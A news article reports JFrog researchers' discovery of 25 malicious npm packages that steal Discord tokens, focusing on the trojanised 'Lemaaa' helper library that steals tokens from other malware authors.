Posted on February 23, 2022 at 7:13 PM
JFrog cybersecurity researchers said they discovered 25 malicious Node Package Manager (npm) packages that are used to steal tokens.
Two researchers at the security firm, Shachar Menashe and Andrey Polkovnychenko, disclosed this in a recent report.
If the threat actor steals the tokens, they can be used to plant malware into the target’s account, hijacking Discord servers. Additionally, they can also be used by the threat actor to sell in the underground, criminal markets.
The security team also disclosed that they have been monitoring and observing major open-source software (OSS) depositories with their automated tooling to prevent any impending supply chain security threats. Some vulnerabilities have already been reported to the vendor to enable them to create security patches before they are exploited by hackers.
The Security Firm Discovered The Packages Using Its Scanning Tools
The security team said the malicious packages were identified by its automated scanning tools, but all the reported malware has been deleted by the npm maintainers. However, the researchers noted that the warning is to inform companies to be security conscious because other malware packages may be existing, but still hiding to avoid being detected.
The researchers also noted that some npm malicious packages may still be fronting as the popular colors.js npm package. This was vulnerable to a major DDoS service attack a few days ago. The threat actors are still effective in their masquerading tactics because colors.js is still highly regarded as one of the most installed packages in npm.
The Threat Actors Are Targeting Other Malware Authors
The security firm said it discovered other malware operators targeting their fellow malware operators in the attack.
One of the malware packages the security team’s scanner uncovered, dubbed lemaaa” is a library that is utilized by malware threat actors to manipulate Discord accounts.
However, the library is capable of hijacking the secret Discord token it receives when it is being used differently. This is in addition to carrying out the basic function it was designed to perform.
The researchers also discovered other packages like environmental variable stealers and remote code injectors.
The “Lemaaa” package caught JFrog’s attention, even after other packages have been detected and removed by the npm maintainers. The library was utilized by malware authors to manipulate Discord accounts.
The Lemaaa Package Has Several Unique Functions
Lemaaa has certain features which make it very attractive to threat actors. it can check and monitor passwords, steal billing information, grab backup codes, and remove friends from a list. Most of these functions can be carried out when a discord token is supplied.
The security team noted that the Lamaaa package is a helper module for Novice Discord malware authors that provide common functions. These can be reused b threat actors when they are supplied with the victim’s Discord token such as stealing the victim’s account or getting the credit card information of the victim.
When the researchers were looking into the activities of Lemaaa, they discovered that the package has been loaded with Trojan to steal the secret Discord tokens supplied to the library and send them to its developer for further actions.
There is a potential for the rise of this type of malicious attack over time, considering that the npm package is used by millions of developers all over the world.
More Packages Could Be Discovered In The Future
The researchers also noted that tens of new malware packages keep springing up regularly, and its security scanner has been discovered more daily. This means that the threat posed by the malicious package will likely continue.
JFrog said it discovered 17 malicious npm packages in December. According to the firm, the packages were developed to steal Discord tokens. They were used to steal account credential details, which enabled threat actors to hijack a Discord server.
Some of the malicious packages discovered include water-template, environmental variable stealer, wafer-text, Typosquatting, Discord token stealer, hidden functionality, wafer-template, tools-for-Discord, mynewpkg, adv-discord-utility, and Crypto-standards, Connectback.shell, markedjs, and Lamaaa. The researchers also stated that there is a high probability that the scanner could pick up more malicious packages in the future.